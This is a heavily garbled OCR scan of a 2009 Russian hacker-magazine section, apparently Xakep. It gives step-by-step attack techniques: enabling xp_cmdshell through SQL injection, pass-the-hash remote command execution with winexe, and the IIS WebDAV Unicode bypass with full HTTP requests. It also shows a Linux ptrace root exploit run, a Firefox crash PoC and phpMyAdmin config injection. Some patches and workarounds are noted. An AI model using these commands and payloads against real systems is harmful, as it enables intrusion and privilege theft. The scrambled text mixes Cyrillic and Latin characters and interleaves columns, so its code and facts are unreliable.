+---------------+------------+----------+--------+---------­
n~ "';> ''1

+--------+-------+

192.168.10.0 2003-12-11; 10:00:37 80 [ер ореп

.... ~;tа ........ ~IO'~,-.Iot.'OWoI'1tt
. .. ,''!44.~ Мffi.WnOllo:iV"I~o\I';'""'~I(I'O" ..
...'''''CoNti1.... oi$'.w,. ..... ~>nd'.''''.fI ~''''hm"I~ ..._
•
oI&>\I"'.
..... "'""'i'1~t<>••• ,~ ...
I 100 I
:~ -- -----"':-=!.::,:-.-:::{)2~<--~u.-·------_·--:--7j;~;;,·---~--··,
1192.168.10.1 2003-12-14 10:00:37 2:' tcp ореп
t;o::a ~,
I 100 I _ _ I'.:x.oI
f(:n; ~

1192.168.10.1 12003-12-14 110:'30:37 I 23 сср lopen

I 100 I Официальныйпроект nmapsql
1192.168.10.1 12003-12-14. 110:00:37 I 80 I tcp I орел 100 I

N
iI
07,1
[tШ1]
ЗАДАЧА: ВКЛЮЧИТЬВОЗМОЖ­
НОСТЬИСПОЛНЕНИЯКОМАНД
ОПЕРАЦИОННОЙ СИСТЕМЫ
~:=~~QdogoЩlon
~'::.'::."Z=::.~

~~'"'..-..4
...."'- ............_ ....... ч- •. -.... __ ..
... <~_·._
а_ . .

"~:.:I ''''''~~''''''"~­
- ,

И СКРИПТОВ ACТlyEX
AUTOMATIO N SQL SERVER 2005

РЕШЕНИЕ:

Инъекция в SOL Sегvегтаитв себе огромную опасность за счет наличия

~ ..~.
L-. ---=''''-=====:>!
большого количества системных хранимых процедур Доступ i< ним поз­
xp_cmdshell по умолчанию НужГ'ые процедурыактивированы
воляет взаимодействовать с оп ерационн ой системой от имени учетной
Г'едоступен

записи SOL -сервера, что в большинстве случаев дает права SYSTEM.

Наиболее интересными являются процедура xp_cmdshell, позволяющая

3. Включаем поддержку xp_cmdshell:
исполнять системные команды, а также sp_oacreate/sp_oamethod для ра­

боты cOLE-объектами, включая доступ кфайловой системе. Для работы с

ехес sp_configure 'хр_сшdshеll' ,1

I
этими процедурами требуется роль sysadmln q не раз сталкивался с при­

ложен иями, работающими от имени 5а, так что это гlетакая уж и редкость,
4. Вкnючаем поддержку oLE АLJtоmаtiоп:
Проблема в том, что Mcrosoft в целях повышениябезопасностиотключает
I
доступ к этим функциямВ конфигурациисервера по умопчанию,Активи­ sр_сопfigurе 'Ole Аutошаtiоп PrOCedtlres 1,1
ровать процедурыможно, испопьзуя инструментарийSOLSLJrface Агеа

I
Сопfigшаtюп, Однако понятие о безопасности у парней из Мiсrоsоft всегда

вызывало умиnение. Обпадая привипегиями sуsаdmiп, можно включить

5. Переконфигурируем :

I
доступ к этим процедурам удаленно с испоnьзованием средств
1. Активируем расширенные опции конфигурирования.
T-SQL. reconfigure

I
Объединяем запросы, разделяя их симовоnом ';', добавляем комментарий
I ехес sp_configllre 'show advanced options' ,1 и внедряем через инъекцию! Теперь можно наспаждаться прак-rИ'1ески
I неограниченным доступом к серверу. Ну а что делать дальше - зависит

2, Переконфиругируем сервер: только от твоей фантазии,

f
P.S. В SOL Server 2000 xp_cmdshell также можно активировать, используя
I
1­ reconfigure процедуру sр_аddехtепdеdргос.

I
IN 81 --
о
_
ЗАДАЧА, УДАЛЕННО8ЫПОЛНЯТЬ

КОМАНДЫ, ЗНАЯ ТОЛ ЬКО ИМЯ

УЧ ЕТНОЙ ЗАП ИСИ И LM/NTLM
passhash,html!. Для ее работы требуется библиотека GNU ТLSдовольно
дpeBHe~1 версии 1 з. ИспользоваТЬWlnехе проще простого

ной окружения 5MBHASH должен находиться хеш в формате «LM:NTLM».

- в перемен­

ХЕШ ПОЛЬЗОВАТЕЛЯ который подцепится автоматом в процессе аутентификации. Если учена

находится вдомене, между именем домена и именем учетки нужно поста­

РЕШЕНИЕ: вить 2 [1) обратных слеша.

Получив LM/NTLM хеши паролей пользователей,всегда возникает
непреодолимоежелание как-нибудь их поюзать:] В принципе, $ export 5MBНASH=" fOd412bd7 64ffе81д.аd3Ь43.5Ь51404ее: 209сб174dа

можно вооружи-rься Samln5ide и некоторым количеством времени 490саеЬ4.22fЗfа5а7аеб34 "

- и получить на i3bIxoAe пароль поnьзователя \но в случае NT хеша $\./\·/inexe -U Admin \\192,168.0,1 "ipconfig"

может и не получ иться 1. Одна ко есть шанс сделать все гораздо

быстрее и проще. Дело атом, чтоу прыоколов NTLMvl и NTLMv2
В Винде для этих же целей мо­
от М$, которые до сих пор используются повсеместно, имеется
жешь использовать PSH Toolklt
одна особенность - для успеШI:IОЙ аутентификации знать пароль
и msvctl. Однак.о PSH Toolklty
необрзательно. При аутентификации клиентиспользуетвели'1ИНЫ,
меня запускаться отказалась

вычисленные с использованием хеша учетной записи, а также

- ей нужна какая-то особен­
сессионного ключа, полученного от сервера !чистый хеш не пере­
ная версия бибnиотеки lsasrv.
дается во избежание его даnьнейшего повторного испольэования
dll, которую мне достать не
В случае перехватаl.
удалось, а m5vctl наотреэ отка­
Для решения задачи можешь воспользоваться пропаТ'1енной верси­
Выполнение ipconfig и whoami на зал ась аутентифицироватьсяв
ей wiпехе - аналогом виндовской psexec для никсов IfoofLls.rlet/jmk/
удаленной машине домене. I

ХАКЕР 06/126/09 ~ 041

 ,.
~~~
\

» В::ЛОМ tЬ
Jj ОБ3'ОР
зксплоuтов

~
ОБ='ОР
зксплоuтов

~ ~ ~
1\
ill ~ Jj ОБВОр
зксплоuтов
~
~ ~ ~
оsзор

~
3КСПЛQUТОВ

ОБ3'ОР

зксплоuтов

АНДРЕЙ .SKVOZ. КОМАРОВ

/[]~~[!J~/EKSPLOITOV
Летняя пора - время отдыха. Как бы ни так, когда речь идет об уязви­
мостях! Соревнования между«злоумышленником» и «защитником»
[применительно к нашему времени - междухакером и вендором) про­
должаются. Число брешей неизмеримо растет К сожалению, все осве­
тить никак не получается, поэтому в этот раз я подготовил на обозре­
ние наиболее важные.

ОБХОД ОГРАНИЧЕНИЙ недоступна на чтение «извне" или жезащищена паролем, ОбращеН~lе

01 В МIСRОSОFТ115 6.0
WEBDAV
к файлу относительно самого хоета: sесгеthоst.гu/sесгеt/sесгеt.ziр. Для
обхода огран"чений посылаем GЕТ-запрос вида:

IJИI GET / %cO%aflsecret/secret. zip HTTP/l.l

Изюминка зтого класса атак в том, что возможность «забрать» искомое с 'I'rапslаtе: f

сервера существует абсолютно безразлично по отношению к за щищен­ Соппесtiоп: close

насти ресурса. WebDAV IWeb-Ьаsеd Dlstributed Аuthопng апd Vегsiопiпgl Host: secrethost.ru

устанавливается в СВIOке с 115, традиционным WEB-сервером для плат­

в
форм линейки "Windows 5erver". WebDAV расш"ряет НТТРследующими Видно, ЧТО В URI мы вставили символ «/» [%cO%af), который будет удален
командами: из WebDav-запроса. Вторая строка указываетWЕВ-серверу на то, цто
запрос следует обрабатывать с помощью средств WebDav. Мы можем
PROPFIND - получение свойств объекта на сервере в формате комбинировать" послать нечто вроде:
X!1L. Также МОЖНО получать структуру релозитория (дерево

катапогов) GET /sec%cO%afret/seoret. zip HTTP/l.l

PROPPATCH - изменение свойств за одну транзакцию Trarlslate: f

МКСОL - создать коплекцию объектов (каталог в случае до­ Conneotion: close

ступа к файлам) Host: secrethost.ru

сору - копирование из одного URI в другой

MOVE - то же, что и предыдущая, только перемещение в отчетпридетсодержимоезащищенногообъекта. даже если дирек­
LOCK - поставить блокировку на объекте. WebDAV поддержи­ тория. в которой он располагался,была защищенапаролем. Можноли
вает эксклюзивные и общие (shared) бпокировки сделать что-либо еще? Смотри описание запроса PROPFIND - с ним
UNLOCK - C'blTb блокирсвку С ресурса можно получ"ть структуру какой-либо папки. Если учесть, что, ИСГIОЛЬ­

эуя U NICODE, мы можем обходить весомые ограничения безопаснос­

Все эти команды являютсядополнительнымиметодами взаимодействия
с WEB-сервером.Узнать более подробно об зтих и основныхзапросах
НТТР-протоколатыможешьиз моей давней стать" 1«Отпечаткипальцев
http" - xakep.ru/magazine/xa/1171038/1.asol. Уязвимость COCТO~~TOM.
что WEB-сервер некорректно обрабатывает URI с UПlсоdе-содержанием.
.'Ц·М
Мicrоsоft 1156.0 WebDAV
ти, - почему бы не применить это для л"стинга каталогов на сервере?
PRQPFIN О [msdnm icrosoft.co Пl/еП-ll sfliЬгагуfаа1429601 ЕХС HG65i.
~I или BPROPFIND Imsdп.miсrosсflсоm/еп-us/liЬгаrv/
aa142725IEXCHG651.aspxJ достаточно подробно описаны, поэтому обо
всех дополнительных включениях ты без труда сможешь узнать.
При мер получения списка файлов внутри директории secret:
PROPFIND /sec%cO%afret/ H'I'TP/l.l

Host: secrethost_ru

"'mтn Usеr-Аgепt: !1ozilla

Предположим. у нас есть директория относительно корня «c:\inetpub\ Соппесt ion: ТЕ

wwwroot\secret\". Соответственно,«inetpub\wwwroot\" -то, что со­ ТЕ: tr'ailers

в
здает 115 по дефолту В ней лежит файл secret.zip, пр" этом директор"я Depth: 1

~ 042 ХАКЕР 06 /1261 09

 ОЕ:30Р ОЕ:30р ОЕ:30Р
» В::ЛОIY1
3КСПЛОUТОБ 3КСПЛОUТОБ ~КСПЛОUТОБ \

Con~ent-Length: 288
230 Ьад:

Content-Type: application/xml
231 'tlrite_un10ck_irqrestore (&task1ist_10ck,

<?xml version=»l. О» encoding= Itutf -8 tr?> f1ags) ;

<propfind xmll,1s="DAV: "><prop>

<getcontentlengch xmlns="DAV:" />

232 task_un10ck(task) ;

<getlastmodi fied xmlns=" DAV: "/>

233 mutex_un10ck(&current->cred_exec~nutex);

<resourcetype хшlпs= "DAV: "/>

2340иС:

<checked-in xmlnS="DAV: "/>

<checked-оuС хшlпs= "DAV: "/>

235 return retval;

</prop></propfind>
236

.1,]··I'['HI На 189 и 2ЗЗ строках ptrace_attach использует мьютекс текущего

На данны й момент не было вы пущено офи циального исп равления процесса для работы с «замком» и двумя процессами [текущим и
уязвимости. поэтому одним из решений может являться отключение тем. который передается Е функцию В качестве аргумента), Из-за
WebDav, Для этого добавь следующее значение IAdd valuel по ключу некорректногоиспользованиясгеd_ехес_гпutехтекущего процесса

«НКЕУ_LOCAL_MAC Н 1N E\5Y5TEM\Cu ггепtСОПlгоL5еt\5егviсеs\WЗ5VС\ вместо процесса. который должен Бы
ьb отслежен. воэникаетситуа­
Parameters»: ция «гонки» вовремя исполнения какого-либо процесса и неконтро­
лируемого обращения к SUIO,
Value пате: DisabIeWebDAV

Data Суре: DvЮRD

Value data: 1
mit",/Orm,com/expLoits/8678

Перезагрузи 115 и отключение вступит в силу Для отключения Практика использования:

протокола WebDAV можно также воспользоваться средством 115

Lосkdоwп, За дополнительной информацией обратись к веб-уз­ # id
лу корпорации Мicrоsоft Imiсгоsоft,соm/tесhпеl/sеCLJгitv/tооLs/ * uid=1000(matthew) gid=1000{matthew) groups=4(adm),
LocktooL,mspx), 20(dialout) ,24 (cdrom) ,25(floppy), 29(audio) ,30(dip} ,44
IIS lockdown lool- утилита от Microsoft. позволяющаялегко и быстро (video) ,46 Iplugdev) ,107 (fuse) ,109 (lpadmin) ,115 (admin) ,
переключить веб-сервер [115 4,0 или 5,0) в режим. когда работа юттол ько 1000 (matthew)
те сервисы, которые хочет предоставить администратор сервера. а все # КОМ.J.LИЛИИ СППОЙТ

другие отключены, Такой подход может стать временным устранением gcc exploi С,. с -о exploit

уязви мости, # ипате -а

Ыпих matt,he\'!-desktop 2 _6 _ 29-020629-generic #020629

ЛОКАЛЬНОЕ ПОВЫШЕНИЕ SMP Тие Иаr

02
24 12:03:21 UTC 2009 i686 GNU/Linux
ПРИВИЛЕГИЙ В GNU/LINUX KERNEL
2.6.29 # while '/biD/true/';do ./exp10it;done
[, .. much scro11 removed, go та 1 ,е coffee, get а job.
Imm до something ~~'hile rUnIJing ... ]
Пробле,~а вызвана функцией «ptrace_attach О» [kernel/ptrace,c] и * /dev/sda1 оп / Суре ехСЗ (rw,relatime,errors=remount,­
использованием«current->cred_exec_mutex» вместо «task->cгed ro)
exec_mutex», - все это может позволить злонамеренным пользова­ proc оп /proc type proc (r\'l. rюехес ,nosu id, node")
телР.м получать привилегии рута с помощью совместных "ptrace О» И /sys оп /sys type sysfs (rw,noexec,rlQsuid,Dodev)
«ехес 1)>> вызовов, Код уязвимой функцVoИ представлен ниже: varrun оп /var/rUrJ type tmpfs (rw.поехес,rюsuid,поdе

У,тоде=0755)

175 int ptrace_attach(struct task_struct *task)

* varlock оп /var/lock type tmpfs (rw,noexec,fiosuid,no
176
деу,тоде=1777)

177 int retval;

идеу оп /деу суре tmpfs (rw,mode=0755J
178 \lПsigпеd long flags;
* dеvshш оп /dev/shm суре tmpEs (rw)
1'79 devpts оп /dev/pts Суре de'rpts (rw,gid=5,mode=620)
180 audlt-ptrace(task);

181

УЯЗВИМАЯ ФУНКЦИЯ В РЕПОЗИТАРИЯХ BUGZILLA

_ _- -­
f
182 retval = -БРЕRJ1;

.... ...
183 lf (same_thread_group(task, current»)
е х . гт_---....-.:о--- __ ;-:7р:;...... ~ '$

184 goto out;

._~~~~~-' ~:"".!'.::i-.c:= >---7:,.~ ~':;";;;;;:';J~.,.""..~"=:;.":, ~:--:..- .•-. ~
185

186 /* Protecr.: ехес' s credenr_ial calculations

::: ~ J;~ ~':::=~~:--:~=~~::::=::"""~-~I'

187
188
agains~ our in~erference; SUID, SGID
creds ge;: determirled diEEerently under ptrace */

апд :,s~r
~=-_."~ ~:=~=~~:"~" . . ,w.~."

::; ~~~3~ ~E,~~:::~~-=E:~~'::::':::~_,_" ...

189 retval = mut,ex_locJcinterruptibIe (
§'Y~' ~~.~ :.:;.';";':::.. .,.. _...'_' ..... <0._'.....''''.-_-''

['-~ -- '.~~.~.-_._~
&current->cred_exec_mutex);

190 i f (retval < О)

о:;: ~ .... -,',::.;::~~~:,::-:.-~-..:._

.. ....-........'" ......... ~.

=~'M·""
191 ge>toout;

192

193 retval = -ЕРБRН;

194 repeat:

ХАКЕР 06/1261 09 ~ 043

 » В::АОМ os~op
3КСПАОUТОВ
os~op
3КСПЛОUТОЕ'
os~op
3КСПЛОUТО~

I .\(:.­ " .
.. _ . • __...... 0 • _ _ ._..:­ 1_ _ r"' __ 1 ~ __ a,_""_(\ _ _
",.. _...... _,__- ­ ...... ...-._...,.,. ,, _
~
-
"
'
:
'
"
:
a
-
_
~
,
~~~~eport [О: n:;ТtJоt:ramt::СIUIТtШRun())

..­ -- .........
..,.~_.""

~~'
~~ §~=~_. =::--"=~
__ и.

, _ ... ~,-\<oyo'­ ...., "

.. __
~~
,.~ ч'''

~"AJ:I

_-­ -­
_
...... _,....,JII
1.'1

...... __...-_... .... -~

---_
~
..
~ ... ... . ~~
~-....:.u
".""""",,,,"~Y~»I

---­ ~~"".ш
•
~Ua.:.,:.J

_,,<:o~
'(
~

..... --[
..

...
. 1»\

,. ЗАПРЕТ РАСШИРЕНИЙ WEBDAV ЧАСТИЧНО СПАСАЕТ ОТ ПРОБЛЕМЫ

): :: ::~=--=.
ii""_'--~~­ --'"'.-'"==."'-"'-"'-'-"-==--,=====------------.--~,;
::"~~ГI

ВСЕ ВЫНУЖДЕННЫЕКРЭШИ БРАУЗЕРАЧЕТКО ОТСЛЕЖИВАЮТСЯИ 3504 / / 5е" соmmепts in В1JildТехtRuпFогFrаюеs,, ,

АНАЛИЗИРУЮТСЯРАЗРАБОТЧИКАМИ 3505 / / if i te;.:t .uп-:>GеtF1Qgs() <~ gfxF'ontGroup: : ТЕХТ __
IS_PERSISTENT) (
* securityfs оп /sys/kerne1/securiry type securityfs (n,) 3506// NS_EF.ROR("Shouldn't reachh re :01'110"1 . . . »);

g'Tfs-fusе-dаеmоп ол /home/matttlew/ ,gvfs type ЕаБе, 3507 / / / / the textrun' s text !1йУ Ье rеfеr'еnсiпg а DOI,1
gvfs-fuse-daemon (rw,nosuid,nodev,user~"atrhew) поdе ёЬа t has changed,
[ I'ПN! 18281 3508// // SO ",e'd betteI' kill this textl-UТJ по".

[ О'Теrwriёtеп ОхЬ8097430 3509 / / if (tехtЕuп->GеtЕхрi::аtiОЛSёаtе

i)­
# id >IsTracKed () J {
\lid=O(roor) gid=,1000(marrhe\>l) grоuрs=4(аdш) ,20(dia10 35:0// gТехtЕuпs->RеnюvеFготСасhеiсехtRuп);

иё) ,24 (сдтош) ,25 (Оорру) ,29(aud10) ,30(dip), 3511 // )

44 (v1deo) ,46 (p1ugdev) ,107{fuse) ,109 (lpadmin) ,115(ad 3512 / / de1 .te cextEUIl;

min) ,1000 (matthew) J 513 / / :-еturПi

3514 / /

Итак. Г1р И В илеги и были уеГ1е шно захвачены. 3515

3516 ii (! (ёехtRuп->GеtF1аgs() &

liЬii,Ш gfxTextEunWordCache: :TEXT_IN_CACHEJ )

тРаёЬ rPath Linux 2 3517 / / Eemove i~ гюи ЬеСдиве it' s лоt. cJoing

rPath App1iance Р1аtfопп Linux service 2 .:щуthiпg seful

rParh App1iance Рlаtfопп Linux Service 1 3518 gТехrЕuпs->RеmоvеFrоmСасhе{tехtRuп)

;

Liпuх kernel 2. б, 29 3519 delete textRun;

3520

ИЬМФffi 3521

Чтобы побеДИТЬУЯЗ8ИМОСТЬ, воспользуйся патчем из GIT [С!it.kегпеl

о r9no~li п ux/ke гпе 1/9 i t/torva lds/li п u х- 2.6,9 il· а=Ь 10 bd iff· f=ke гп el/pt га се. с ' Приведеннаявыше функция взята из файла lауоut/gепегiсl
h=0692ab5aOd672341000d1697d7c308c566060fb4'hp=dfcd83ceее3Ь24632 nsTextFrameThebes.cpp, Рассмотрим подробнее, что же она делает,
6cbee2a6eadb27abdba7823'hb=cad81bc2529ab8e62b6fde83a1eOc7f4a872 Сначала устанавливаетуказатель textRun на mTextRun (34981, Далее
0geb'hpl)=ce8a7/,24d23a36f043dOde8484f888971 е831119), проверяет, не равен ли texlrun NULL (3500). СНИl-\ает хуке фрейма и
Г1роверяет. присутствует ли textrun в кэше, Если да, то удаляетего из
кеша, а затем удаляети сам объект, 3акомментированныйучасток кода

О3
MOZILLA FIREFOX
также содержитошибки. Ошибка в том, что mTextRurJ может содержать
MEMORY
некорректные флаги от предыдущих операций, - это при ведет к некор­
CORRUPTION
ректн о му удален ию [3519) Из-за подобн ых соображе н v\и разработч ики

иrmi MOZilla позднее ввели новуюдополнительную константу:

Брешь обнаружили Маге Gueuгy и DаПlеl Veditz, после чего та была офи­
циально опубли кована в базе CVE ICVE-2009-1313), Касается она крзwа + ! / Set "'hen rhis сехё frame is mentioned in the

браузера путем ЭКСГ1луатации ГcJП5ТехtFгаmе:,СlеагТехtRuпl), Llserdata for а textrun

+ #define ТБХТ_IN_ТБХТRUN_USЕR_DАТА Ох40000000

50/* r'endering ohjec': :or l.,?xt.lJal content о' lements */ +

3494 \1Оiд

"'tftФIO
3495 nsTextFrame: : СlеаrтехtR\.lП ( )
Код эксплоита приведен ниже.
3496

3497 ;,/ S()Ve text r1.iП bccause

<html:><head><tit1e:> B\lg 489647 - Ые", 1,9.0.9 topcrash
CJea:["AllTe)~LRunRe:erences','/ill clear f)UrS [@nsTextFrame::C1earTextRun()]</title></head>
3498 g'fхтехtRЩ1* textRun = mTextRun; <body>
3499
( <div ,д=»а» styleo=»whlre-space: pre; »>
3500 if (!rexrRun)
m</div>
3501 rеturп;
<scripc>
3502
fuпсtiоп doe ()
J' В
3503 UnhookTextRunFromFrames(rexrRull); docLunent,getElementByld('a') ,chi1dNodes[0].

ХАКЕР 06/126/ 09
ОВ
ОЕа0Р
3КСПЛОIJТОВ
ОБ30Р
3КСПЛоIJТQ8
ОБ30Р
3КСПЛОIJТОВ
»

Fonn_ ..........

F:.rmTIt1e: "",bl",,[:lJ6

[~Ь@"
5...... • О

AuLl':orA~:

Ct:.nSi~ cтн(~ Ьу:

Мninш10r ~-6
ТittyMCEli;l\t Orw=
_. ~ О
O(O!fe<1f<;<Ы ••,,} ~ О
Rio..·rrit3:I:re~fdd.i:te:
'.9!rg.-ll.J.D 00;00;00 _",JO
P,,;!;{'$h и;<,: _
19~11--3000:00:00 ---=.JO
PlJЬ!М\Di:м:n:

N8NИ _---=.J6
10:

КОМПОНЕНТ АRТFОRМSСОБСТВЕННОЙ ПЕРСОНОЙ

VU?EN

'iliiii HUal8 [n1Jd ·l'b"tп_IbI:.О·ш:.IPn,~еlеЕКilLmм Vulamllliity

~­ . 1 <?php

10 class ConfigFile
11{

Н 1i1~: ~ I:em~ ·Фщ.it'.ю(f·L'ХАIPri-n!~~"JJ~~~ 12 /**

VLl'EN!О:WPБ'l/W!'N!I9'~
CVEID:CVE-2009·lS27
R~е4f$:l'!OOшteR~D

13 * Stores default РМА config from сопЕ ig _default.

Р.е.'D&.tI,Щi«tаы,;1+:I

I.oc.Wffl~:'r~

php
~*и D~; m·IЗS·04
14 * @var array
15 */
;:, ~lIl~ra!!ГП1' 1Ia, !Ittл иrr,!lItd I!I ~ Ktrn~, "h;dI arJd Ье щ-/о;~ ~~ J loJCaI3ttad:~ Ь ~;a, r'!le:~пd
16 private $cfg;
~~t9CS. Ths i:lW! i$ cMt'd d~'f t;I) l1!t 'ptт~_ ...'t«Ь(J' l~arndlptrbC:'.L] h!i'l::IIX, .щ

·!7,,!:t:it-:С'd,шс_:-:,~:(mtj.d ·~"'o~·:Cиec_rr ....~t·. ~'1idJ (;1J:j,d ~ЩI m.ШJcш IISlJstп ~UI rnat

ЭКСПЕРТЫ ОЦЕНИВАЮlРИСК ПОВЫШЕНИЯ ПРИВЕЛЕГИЙ НА LINUX 259 /**

КАК СРЕДНИИ (ЖЕЛТЫ И ЦВЕТ). НА САМОМ ЖЕ ДЕЛЕ МЫ ПОНИМАЕМ, 260 .* Creates config Н1е
ЧТО ЗАХВАТ МАШИНЫ ДОСТАТОЧНО ОПАСНАЯ ВЕЩЬ, ДАЖЕ НЕСМОТ­
261
РЯ НА ТО, ЧТО ТРЕБУЕТОПРЕДЕЛЕННЫХУСЛОВИЙ
262 * @return string

263 */

sp1itText(1) ; 264 public function getConfigFile ()

265 {

setTimeout(doe, 100); 266 $crlf = (i sset ($_SESSION [ , ео1 ' ]) && $_

</scrip;::> SESSION['eol'] == 'win')? "\r\n" ; "\п";

</body> 267 $с = $_SESSION[ 'ConfigFile'];

</htm1> 268

269 / / header
После исполненияуказанного кода происходитаварийноезавершение 270 $ret = '<?php' . $crlf
работы браузера.

279 // servers
IM6i;·blE 280 if ($this->gеtSеrvеГСоuпt() > О) (
MoziLla Flгеfохдо версии 3.0.10 281 $ret . = "/ * Servers configuration * !$cr1f\$i
= О;" $crlf. $crlf;
".t1mlfМj 282 foreach ($o['Servers'] аэ $id => $server) {
в новых версиях Firefox уязвимость своевременно устранена. 283 $ret . = • /* Server; . $this­
>gеtSегvеl-Nаmе($id) . " [$id] */" $crlf

О, ВНЕДРЕНИЕ 284 . '$i++;' . $cr1f;

КОДА В PHPMYADMIN 285 foreaoh ($server as $k => $v) {

\, 286 $ret .= "\$cfg[ 'Servers'] [\$i] ['$k']

:::: «
Кто бы мог подумать, что во время установки Phpmyadmin мы 28'1 var_export ($v, true) . ' . ' . $cr1f;
можем произвести эксплуатацию кода' Рассмотрим вни~~ательно 288
сорец, использующийсяустаНО80ЧНЫМфайлом для формирования 289 $ret $crlfi
конфига: 290

ХАКЕР 06 /126/ 09
 » в::лоМ OE;~OP
3КС;ПЛОUТОВ ::~:~M" ~ ~ ~ OE;~OP
3КС;ПЛОUТОВ

1\ '~

Dhgm'lаdmiп.svп.sоuгсе~t/\liеwvс/рhрmУ<Jdmiп?viеl'l-геv&гevis
iоп-12342 .
• ph р myad m i Il.5VIl.SO U('cefo 1'9 е. net/viewvc/ph gmyad m i n ?viеw-геv& гevis
iоп~12З48.

РАСКРЫТИЕ ПУТЕЙ

05 BZERVIТ

WEBSERVER 4.0
fmШj.

~fti:t~1:~~~~~~~~~1

КлассифИК<JЦИЯ подобной атаки - Directory Traveгsal. В литературе и сов­

ременныхсистемах классификациивектор атаки казывают Path Traversal.
Сам ый большой риск, KOTOpbl й она влечет за собой, CKpЫ8aeTC~ не только
ОГРОМНЫЙ СПИСОК УЯЗВИМОПЕЙ JOMMLA, ЛЬВИНАЯ ДОЛЯ КОТО­ в листинге директорий, но и в обходе ACL -листов. Эта техн ика ата к
РЫХ СОДЕРЖИТСЯ В КОМ ПОНЕНТАХ. ВСЕ ЭТО ИМЕЕТ НА СВОЕМ БОРТУ направлена на получениедоступа кфайлам,директориями командам,
JOOM5CAN ДЛЯ ПРОВЕРОК
находящимс~вне основнойдиректорииWeb-сервера.Злоумышленник
может манипулироватьпара метрами URLc целью получениядоступа
291 $r'et , 1* E.l.ld of servers configuration * / I к файлам или выполнить команды, располагаемыев файловойсистеме

. $crlf $сгН;
Web-сервера.Для подобныхатак потенциалы,оуязвимолюбое
292
Итак, функция getConflgFILe[1 В03враЩ<Jет всякого рода информацию
Здесь составляется конфигурационный файл. и $гet инклудит РН Р­
код. На 281 строке мы видим комментарий, а затем еще один
<getSeгverNameO> «id» */1. Обрати внимание: выходиттак, что $id полностью
контролируется пользователем сразу, К<JКТОЛЬКО переменная была получена
из сессии [267J. Скажем, если пользователь передаст ее установленной в
виде "bLeh */ <?php echo date[J;?> /*», то тем самым он завершит конфигу­
рационный файл строкой «/* Seгver: <gelSeгverNameO>bleh
dateO:?> /* */».
устройство,
имеющееWeb-интерфеЙс.Многие Web-серверbIограничиваютдоступ
пол ЬЗО8ателя оп ределенной частью файловой системы, обычно называе­
мой «web docuгnent гoot» или "CGI гоо!}). Эти директории содержат файлы,
предназначенныедля пользователя, и программы, необходимыедля
U* Seгver: получения доступа к фун кциям Web-приложения. Большинство базовых
атак, эксплуатирующих обратный путь, основаны на внедрении в URL
символов " ../}) - для того, чтобы изменить расположение ресурса, который
будет обрабатываться сервером. Посколькубольши нство Web-серверов
фильтруют эту последовательность, злоумышленник может воспользо­
*/ <?phpecho ваться альтернативн ыми кодировками, например, Uпiсоdе [" ..%u2216»
или «.. %cO%af,,!. Другие популярные приемы - использование обратного
слеша k.\») в WlПdоws-серверах,символов URLEncode 1«%2e%2e%2f})1

овиш или двойная кодировка URLEncode k.%255c»J.

phpMyAdmin 3.х [до 3.1.3.2.] Даже если Web-серверограничиваетдоступ кфайлам определенным
К<Jталогом, эта уязвимость может возникать в сценариях или CGI-npo­
$1fiфfflfii
граммах Воэможностьиспользованияобратного пути в каталогах
Требуется огра н ич ить передаваемы е A<J н н ые с помощью pregJeplace!J:
довольно часто возникает в приложениях,использующихмеханизмы

шаблонов или загружающихтекст страниц из файлов на сервере. В этом

foreach ($с l' Sелтегs' ] as $id => $server) ( варианте атаки злоумышленникмодифицируетимя файла, передавае­
+ $k = preg_replace(' / [AA-Zа-zО-9_]/', '_', $k); мое в качестве пара метра CGI-програММbIили серверногосценария. В
$ret .= '/* Server: ' . $this->gеtSегvеГNаmе($id)
реэультатеОН может получить исходны
й код сценариев. Нередко к имени
[$id] */' . $crlf
запрашиваемогофайла добавляютсяспециальныесимволы, такие хак
"%00,,, с целью обхода фильтров. Бывает, что при эксплуатациитакого
и применить офИЦИ<JЛЬНО 8ышедшие обновления. рода уязвимостейв ответ на их популяРНОСТЬ при меня ются IDS-систе­

мы, которыеурезаютзапросы с «хождением»ПО каталогам ["/../../../»]

вариациоfНiOЙrлубины. Требуется помнить, что кроме стандартного
УСПЕШНЫЙ ОБХОД И ПРОВЕДЕНИЕАТАКИ «DIRECТORYTRAYERSAL»
символа мы можем использовать, к примеру," .\. \», «..1..\..1..\», а также
раЗН08ИДНОСТИ кодированного содержимого .
.~'

ТИПИЧНЫЙ ОТВЕТWЕВ-СЕРВЕРАПОСЛЕ ИСПОJilНЕНИЯ PROPFIND

061ZSJZOOl 01:26)) <:))]А;. DOC\DIOII!Dt,S '!Шd Set-:.lng'::

q 1­ .-- .. ---­ -:--,' ~~I;!H~

ОЦ25!2001 12:~q.IJ -<J)[II)- I.III:t~\Ib

061,5/2001 а:"1Эр <D]Jt> Proar" rlle~

~sponя Codt: 2D7
Q6/2S/2001 01'i:?p <1)]11.)­ 'IЮП

о Y~le.ts) а J:lytes
~; HTTP/1.12D7Multr-st.tш
1 Dir(~1 2,178,79.,56:;) Ь~tеэ J::I:"ee

D.I<:Мon,23 Aug 199920:21:24 GI'1T

050"'0" Ар • .м/1.3.6 (Unix)DAY/O.9.B
OConnf'Ction: close
ОТr~r-Еrюodtn9:chunkfod
OCorrttnt M
Тур,; i.tJct/xml; е:hlJГstl:=.. utr-s"'
О
063!
О<?xml wrs'too=",.oM ~соdiAtFNutf-8И?>аФ:mY"ist.rtus .xmlns:-J)=-оАV ;")DФ:г~spоl"l$"e'>О
Ф :hn?f>/foo.ljlif</O :hn!ofЮФ :рropsytюф :prорЮФ )"esOIJrOe'type/)(/O :рrор.>ОФ :stitus>HТТP /1 . t
200 ак</0 :status>O</D :pt'Opst.atЮ</D :r'tsрОl"IЯ)[]ф :t't"SPOnsto)[)«) :hreof>/bar -9П </0 :href>Q
~;Pf"C)I)S't~t>QФ:рrор)[]фум:ourct'typfl)(/t):Рr'ор>Оф:statu:s)НТТР/t.1 200 1)К (/О ;sЦws:>[]
</D:pI"'Oрrnt>О</О7es:РGn$@>Q<О7@sрanS'e>QФ:hrE'f>/соруtts:t/</t)~hrtf>t]Ф~ps1~)[ЗФ:рrор)[],~
Ф:l"'6OUroe~)Ф:ооlltсtЮn/><II>:NSOUrсеtур4-)Q</Г):РNP)QФ:s1ai.us>НТТР/I.t 200 О'К</О ::stafus>

~~=:::~<=~;=~~:;;~~~:6:~~~~~%~~~~ [!
Ф:rмponse>Dф:hrеf>/tm/ <ID :hI"еf)[]ф ::рropstаt>Qф :prop>O
Ф:rf'Sоur<>etype.)ф :colk!c1ion/)</0 тesour~)О</D:pr09)ОФ:sU1us:>НТТР/1.1 200 OК<IO ::status:)
